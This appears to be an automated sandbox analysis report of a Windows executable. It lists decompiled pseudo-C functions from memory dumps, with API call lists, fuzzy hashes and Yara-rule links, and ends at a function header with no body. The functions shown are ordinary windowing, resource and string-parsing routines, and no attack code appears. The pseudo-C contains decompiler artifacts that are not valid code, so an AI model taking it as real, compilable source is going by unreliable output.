Part of subcall function 00401D80: _memcpy_s.LIBCMT ref: 00401E17

FindResourceA.KERNEL32(?,00000034,00000005), ref: 0040CA05
LoadResource.KERNEL32(?,00000000,?,?,00000030,004136DE,?), ref: 0040CA0D
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,00000030,004136DE,?), ref: 0040CA25

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$_memcpy_s$FindFreeLoad
String ID:
API String ID: 3154194310-0
Opcode ID: 67fa323749841caeb3f779f8e4837c1c80f0c8590dfa05056c431ee4b62cbdaa
Instruction ID: bb8511196ae9bfc1f8b33b24d5ec206f76bae843889eda254133b9ea0f7c68cd
Opcode Fuzzy Hash: 67fa323749841caeb3f779f8e4837c1c80f0c8590dfa05056c431ee4b62cbdaa
Instruction Fuzzy Hash: 5B21C172A05610AFD700EF19DC88E5BF7E9EF98354F00456EF540A7361D778AC058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B86C, Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041B86C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t76;
				intOrPtr* _t78;
				signed int _t81;
				void* _t83;
				void* _t84;

				_t84 = __eflags;
				_t76 = __edx;
				_push(0x20);
				E004271DA(E0043ABFA, __ebx, __edi, __esi);
				_t81 = 0;
				 *((intOrPtr*)(_t83 - 0x10)) = 0;
				 *((intOrPtr*)(_t83 - 0x14)) = 0x43f410;
				_t68 =  *((intOrPtr*)(_t83 + 8));
				_t71 = _t83 - 0x1c;
				 *(_t83 - 4) = 0;
				E0040E6CB(_t83 - 0x1c, _t84,  *((intOrPtr*)(_t68 - 0xb0)));
				_t78 =  *((intOrPtr*)(_t83 + 0x14));
				 *(_t83 - 4) = 1;
				if((0 | _t78 != 0x00000000) == 0) {
					E00415838(_t71);
				}
				 *_t78 = _t81;
				if( *((intOrPtr*)(_t68 - 8)) == _t81) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E004140EE(_t68, _t76, _t78, _t81, __eflags);
					__eflags = _t51 - _t81;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t81) {
						goto L3;
					} else {
						__eflags =  *(_t83 + 0xc) - _t81;
						if( *(_t83 + 0xc) != _t81) {
							IntersectRect(_t83 - 0x2c, _t68 - 0x9c,  *(_t83 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t78 =  *((intOrPtr*)(_t83 + 0x14));
							_t81 = 0;
						}
						E004143AD(_t83 - 0x14, _t78, _t83, CreateRectRgnIndirect(_t83 - 0x2c));
						E00413EBA( *((intOrPtr*)(_t68 - 8)), _t83 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t81;
						if(_t69 != _t81) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t83 - 0x18)) - _t81;
						 *_t78 = _t70;
						 *(_t83 - 4) = 0;
						if( *((intOrPtr*)(_t83 - 0x18)) != _t81) {
							_push( *((intOrPtr*)(_t83 - 0x1c)));
							_push(_t81);
							E0040DF8F();
						}
						 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t83 - 0x14)) = 0x43de94;
						E00414400(_t83 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t83 - 4) = 0;
					if( *((intOrPtr*)(_t83 - 0x18)) != _t81) {
						_push( *((intOrPtr*)(_t83 - 0x1c)));
						_push(_t81);
						E0040DF8F();
					}
					 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t83 - 0x14)) = 0x43de94;
					E00414400(_t83 - 0x14);
					_t53 = 0x80004005;
				}
				return E004272B2(_t53);
			}

0x0041b86c
0x0041b86c
0x0041b86c
0x0041b873
0x0041b878
0x0041b87a
0x0041b87d
0x0041b884
0x0041b88d
0x0041b890
0x0041b893
0x0041b898
0x0041b8a2
0x0041b8a8
0x0041b8aa
0x0041b8aa
0x0041b8af
0x0041b8b4
0x0041b8f7
0x0041b8f8
0x0041b8fd
0x0041b8ff
0x0041b902
0x00000000
0x0041b904
0x0041b904
0x0041b907
0x0041b92b
0x0041b909
0x0041b912
0x0041b913
0x0041b914
0x0041b915
0x0041b916
0x0041b919
0x0041b919
0x0041b93f
0x0041b94d
0x0041b952
0x0041b955
0x0041b957
0x0041b95d
0x0041b959
0x0041b959
0x0041b959
0x0041b960
0x0041b963
0x0041b965
0x0041b969
0x0041b96b
0x0041b96e
0x0041b96f
0x0041b96f
0x0041b974
0x0041b97b
0x0041b982
0x0041b987
0x0041b987
0x0041b987
0x0041b8b6
0x0041b8b6
0x0041b8b9
0x0041b8bd
0x0041b8bf
0x0041b8c2
0x0041b8c3
0x0041b8c3
0x0041b8c8
0x0041b8cf
0x0041b8d6
0x0041b8db
0x0041b8db
0x0041b98e

APIs

__EH_prolog3.LIBCMT ref: 0041B873

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetDC.USER32(?), ref: 0041B8F1
IntersectRect.USER32 ref: 0041B92B
CreateRectRgnIndirect.GDI32(?), ref: 0041B935

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
String ID:
API String ID: 3511876931-0
Opcode ID: 2541bdbd50b41508b6b6a0c022eb074156aadf2da7e1fc31466aebedd9e90a54
Instruction ID: 6c8177e3c42cdfbe7fce3bcbb5394a75abb5b2bcbcd446f29c35724b48bf6920
Opcode Fuzzy Hash: 2541bdbd50b41508b6b6a0c022eb074156aadf2da7e1fc31466aebedd9e90a54
Instruction Fuzzy Hash: BC316071D0021ADFCF11DFA4C585AEEBB75EF18704F10805BE511AB291C7785E86CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420C45, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00420C45(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t30;
				signed char _t33;
				signed char _t34;
				signed char _t35;
				intOrPtr _t36;
				intOrPtr _t38;
				void* _t46;
				intOrPtr* _t47;
				void* _t49;
				void* _t50;
				void* _t62;
				void* _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t68;
				void* _t69;

				_t63 = __edi;
				_t62 = __edx;
				_t50 = E0040E6B2(_t49, __edi, _t66, __eflags);
				_t27 =  *((intOrPtr*)(_t50 + 0x10));
				if(_t27 == 0) {
					L20:
					return 0 |  *((intOrPtr*)(_t50 + 0x10)) != 0x00000000;
				}
				_t30 = _t27 - 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t30;
				if(_t30 != 0) {
					goto L20;
				}
				if(_a4 == 0) {
					L8:
					_push(_t63);
					_t64 =  *((intOrPtr*)(E0040E67F(_t50, _t63, 0, _t76) + 4));
					_t68 = E00416DE8(0x450cbc);
					if(_t68 == 0 || _t64 == 0) {
						L19:
						goto L20;
					} else {
						_t33 =  *(_t68 + 0xc);
						_t79 = _t33;
						if(_t33 == 0) {
							L12:
							if( *((intOrPtr*)(_t64 + 0x98)) != 0) {
								_t34 =  *(_t68 + 0xc);
								_t69 = _t68 + 1;
								_t35 = _t34 | 0x00000083;
								 *[gs:eax] =  *[gs:eax] | _t35;
								_t82 = _t35;
								if(_t35 != 0) {
									_push(_t35);
									_t38 = E00429DE3(_t50, _t62, _t64, _t69, _t82);
									_push( *((intOrPtr*)(_t69 + 0xc)));
									_a4 = _t38;
									E00426256(_t50, _t62, _t64, _t69, _t82);
								}
								_t36 = E00426490(_t50, _t62, _t64, _t69,  *((intOrPtr*)(_t64 + 0x98)));
								 *((intOrPtr*)(_t69 + 0xc)) = _t36;
								if(_t36 == 0 && _a4 != _t36) {
									 *((intOrPtr*)(_t69 + 0xc)) = E00426490(_t50, _t62, _t64, _t69, _a4);
								}
							}
							goto L19;
						}
						_push(_t33);
						if(E00429DE3(_t50, _t62, _t64, _t68, _t79) >=  *((intOrPtr*)(_t64 + 0x98))) {
							goto L19;
						}
						goto L12;
					}
				} else {
					if(_a4 != 0xffffffff) {
						_t46 = E0040D088();
						if(_t46 != 0) {
							_t47 =  *((intOrPtr*)(_t46 + 0x3c));
							_t76 = _t47;
							if(_t47 != 0) {
								 *_t47(0, 0);
							}
						}
					}
					E00420B79( *((intOrPtr*)(_t50 + 0x20)), _t63);
					E00420B79( *((intOrPtr*)(_t50 + 0x1c)), _t63);
					E00420B79( *((intOrPtr*)(_t50 + 0x18)), _t63);
					E00420B79( *((intOrPtr*)(_t50 + 0x14)), _t63);
					E00420B79( *((intOrPtr*)(_t50 + 0x24)), _t63);
					goto L8;
				}
			}

0x00420c45
0x00420c45
0x00420c4f
0x00420c51
0x00420c58
0x00420d30
0x00420d3b
0x00420d3b
0x00420c5e
0x00420c61
0x00420c64
0x00000000
0x00000000
0x00420c6d
0x00420cb1
0x00420cb1
0x00420cb7
0x00420cc4
0x00420cc8
0x00420d2f
0x00000000
0x00420cce
0x00420cce
0x00420cd1
0x00420cd3
0x00420ce4
0x00420ceb
0x00420ced
0x00420cee
0x00420cef
0x00420cf1
0x00420cf4
0x00420cf6
0x00420cf8
0x00420cf9
0x00420cfe
0x00420d01
0x00420d04
0x00420d0a
0x00420d11
0x00420d19
0x00420d1c
0x00420d2c
0x00420d2c
0x00420d1c
0x00000000
0x00420ceb
0x00420cd5
0x00420ce2
0x00000000
0x00000000
0x00000000
0x00420ce2
0x00420c6f
0x00420c73
0x00420c75
0x00420c7c
0x00420c7e
0x00420c81
0x00420c83
0x00420c87
0x00420c87
0x00420c83
0x00420c7c
0x00420c8c
0x00420c94
0x00420c9c
0x00420ca4
0x00420cac
0x00000000
0x00420cac

APIs

__msize.LIBCMT ref: 00420CD6
__msize.LIBCMT ref: 00420CF9
_malloc.LIBCMT ref: 00420D11
_malloc.LIBCMT ref: 00420D26

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 24b5e40666eea26cce0aecb199dd3397c4ea894e0fe311ea8f1ec6e54e54776d
Instruction ID: 2c0f6476db5fa24d72c34f31a5f5d0d07ea1d9ca555583005a90796c0f08a82f
Opcode Fuzzy Hash: 24b5e40666eea26cce0aecb199dd3397c4ea894e0fe311ea8f1ec6e54e54776d
Instruction Fuzzy Hash: 32217A317112249FD729AFB2F88555B77D5AF04758B94896FE8088A253DF38EC50C78C

Uniqueness

Uniqueness Score: -1.00%

Function 00424DC1, Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00424DC1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E004271DA(E0043B6BA, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E0040E6CB(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E0040DF8F();
						}
						L17:
						return E004272B2(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E0040DF8F();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

0x00424dc1
0x00424dc1
0x00424dc8
0x00424dd3
0x00424dd9
0x00424de6
0x00424de9
0x00424e4e
0x00424e4e
0x00424e51
0x00424e73
0x00424e79
0x00424e7b
0x00424e85
0x00424e85
0x00424e88
0x00424e88
0x00424e8f
0x00424e91
0x00424e94
0x00424e95
0x00424e95
0x00424e9d
0x00424ea2
0x00424ea2
0x00424e53
0x00424e53
0x00424e57
0x00424e5a
0x00424e5c
0x00424e5f
0x00424e60
0x00424e60
0x00424e65
0x00424e67
0x00000000
0x00424e67
0x00424dee
0x00000000
0x00000000
0x00424df5
0x00424dfd
0x00000000
0x00424e04
0x00424e0a
0x00424e11
0x00424e24
0x00424e28
0x00424e3b
0x00424e46
0x00424e49
0x00000000
0x00424e49

APIs

__EH_prolog3.LIBCMT ref: 00424DC8
PeekMessageA.USER32 ref: 00424E22
PeekMessageA.USER32 ref: 00424E39
PeekMessageA.USER32 ref: 00424E73

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: e914693460a366701039cc11f493173081ccd0225336bdf7c47820115a114b29
Instruction ID: 5973ff5ae2ff6bbe06cf0172e1fc7c781233efc4daa66bbe4b72cdc0d41675d6
Opcode Fuzzy Hash: e914693460a366701039cc11f493173081ccd0225336bdf7c47820115a114b29
Instruction Fuzzy Hash: 6F315E71A00225ABEF209FA4ED85E6F73B8FF44304F51492EF552A62D1D774AA40CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00417F71, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00417F71(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x44f5d0; // 0x765b253d
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E0042A3C2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E0042A3C2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E0042A2F2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E0042A203();
						} else {
							_t23 = E0042A1DA();
						}
						L17:
						return E0042569C(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

0x00417f71
0x00417f71
0x00417f7a
0x00417f81
0x00417f87
0x00417f8a
0x00417f8f
0x00417f95
0x00417f96
0x00417f99
0x00417f9e
0x00417fb1
0x00417fb2
0x00417fb4
0x00417fba
0x00417fd5
0x00417fca
0x00417fd0
0x00417fd0
0x00417fda
0x00417fde
0x00417fe7
0x00417fe7
0x00417fed
0x00417ff5
0x00417ff6
0x00417ff7
0x00417ff9
0x00417ff9
0x00417ffd
0x00417fa6
0x00417fa6
0x00000000
0x00417fff
0x00418003
0x0041800b
0x0041800d
0x0041800e
0x00418017
0x00418010
0x00418010
0x00418010
0x0041801f
0x0041802b
0x0041802b
0x00417ffd
0x00417fa2
0x00417fa4
0x00417fa4
0x00000000

APIs

CharNextA.USER32(?), ref: 00417FC8

Part of subcall function 0042A3C2: __ismbcspace_l.LIBCMT ref: 0042A3C8

CharNextA.USER32(00000000), ref: 00417FE5
_strtol.LIBCMT ref: 00418010
_strtoul.LIBCMT ref: 00418017

Part of subcall function 0042A203: strtoxl.LIBCMT ref: 0042A223

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: 2638da4993466c2773c4beb52b6204f88b9adedd56d6812a14930e975aec3612
Instruction ID: fa9e7c45f595be2051f2ee94049ba6aca390518ee0a1daf640d5e113ed6d46a1
Opcode Fuzzy Hash: 2638da4993466c2773c4beb52b6204f88b9adedd56d6812a14930e975aec3612
Instruction Fuzzy Hash: B72105726041149BCB20EB759C41BEBBBB8AF59314F51006BF984D7240DB78DD828B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CEC8, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041CEC8(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E0041CE65( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x0041cecc
0x0041ced1
0x0041cf75
0x0041cf75
0x0041ced8
0x0041cee0
0x0041cef4
0x0041cef7
0x0041cf4d
0x0041cf53
0x0041cf53
0x0041cf56
0x0041cf5b
0x0041cf6c
0x0041cf6c
0x00000000
0x0041cf72
0x0041cef9
0x0041cefa
0x0041cf3d
0x0041cf3d
0x0041cf41
0x00000000
0x00000000
0x0041cf46
0x00000000
0x0041cf46
0x0041cefc
0x0041ceff
0x0041cf35
0x00000000
0x0041cf35
0x0041cf01
0x0041cf02
0x00000000
0x0041cf04
0x0041cf04
0x0041cf07
0x0041cf0f
0x0041cf14
0x0041cf19
0x0041cf22
0x0041cf25
0x0041cf2a
0x0041cf2f
0x0041cf2f
0x0041cf2a
0x0041cf19
0x00000000
0x0041cf07
0x0041cf02
0x0041cee2
0x0041cee6
0x00000000
0x0041cee8
0x0041cee9
0x00000000
0x0041cee9

APIs

SafeArrayDestroy.OLEAUT32 ref: 0041CEE9
CoTaskMemFree.OLE32(?), ref: 0041CF6C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 7b9b03ece6cf9f21693732497ce27a94767853dffeb6a42d7859361abe70c2a0
Instruction ID: 6592ffaa93fc67471968f81d5582b366d4950fb58849822c9d831fb630cdefec
Opcode Fuzzy Hash: 7b9b03ece6cf9f21693732497ce27a94767853dffeb6a42d7859361abe70c2a0
Instruction Fuzzy Hash: AD117230584206ABDB259F69EDC8BE77766EF00741B14441AF959C63D0C739DC82CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA50, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041BA50(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_push(0x30);
				E004271DA(E0043AC25, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t65 - 0x18)) = 0;
				 *((intOrPtr*)(_t65 - 0x1c)) = 0x43f410;
				_t63 =  *((intOrPtr*)(_t65 + 8));
				 *(_t65 - 4) = 0;
				E0040E6CB(_t65 - 0x14, _t66,  *((intOrPtr*)(_t63 - 0xb0)));
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t65 + 0xc)));
					_t61 = E0041439F(0, __edx, __edi, _t63, __eflags);
					GetRgnBox( *(_t61 + 4), _t65 - 0x2c);
					IntersectRect(_t65 - 0x3c, _t65 - 0x2c, _t63 - 0x9c);
					_t44 = EqualRect(_t65 - 0x3c, _t65 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t65 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t63 + 0x64))(_t63, _t55);
						 *(_t65 - 4) = _t55;
						_t64 = _t46;
						if( *(_t65 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t65 - 0x14)));
							_push(_t55);
							E0040DF8F();
						}
						_t55 = _t64;
						L5:
						 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t65 - 0x1c)) = 0x43de94;
						E00414400(_t65 - 0x1c);
						return E004272B2(_t55);
					}
					_push(_t61);
					E0041A618( *((intOrPtr*)( *((intOrPtr*)(_t63 - 0xac)) + 0x20)));
					__eflags =  *(_t65 - 0x10);
					 *(_t65 - 4) = 0;
					if( *(_t65 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t65 - 0x14)));
						_push(0);
						E0040DF8F();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t65 + 0x10)));
				goto L2;
			}

0x0041ba50
0x0041ba50
0x0041ba57
0x0041ba5c
0x0041ba5e
0x0041ba61
0x0041ba68
0x0041ba74
0x0041ba77
0x0041ba7f
0x0041ba83
0x0041bac1
0x0041bac9
0x0041bad2
0x0041bae7
0x0041baf5
0x0041bafb
0x0041bafd
0x0041bb00
0x0041ba88
0x0041ba8c
0x0041ba92
0x0041ba95
0x0041ba97
0x0041ba99
0x0041ba9c
0x0041ba9d
0x0041ba9d
0x0041baa2
0x0041baa4
0x0041baa4
0x0041baab
0x0041bab2
0x0041babe
0x0041babe
0x0041bb0b
0x0041bb0c
0x0041bb11
0x0041bb14
0x0041bb17
0x0041bb19
0x0041bb1c
0x0041bb1d
0x0041bb1d
0x00000000
0x0041bb17
0x0041ba85
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0041BA57
GetRgnBox.GDI32(?,?), ref: 0041BAD2
IntersectRect.USER32 ref: 0041BAE7
EqualRect.USER32 ref: 0041BAF5

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: b81a1bff1303f9d65d2710fa88f8fdeec9efe10be30b700777f64474b8b6e4ed
Instruction ID: 6e5861cc58b4ae00a5371a8c93efb1e777733a2a56ae9058c611aef19aa2f4a0
Opcode Fuzzy Hash: b81a1bff1303f9d65d2710fa88f8fdeec9efe10be30b700777f64474b8b6e4ed
Instruction Fuzzy Hash: 0C212A71D00209EFCB11EFA5D8819EEBBB8BF08304F00856AF515A3251CB389A55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415530, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

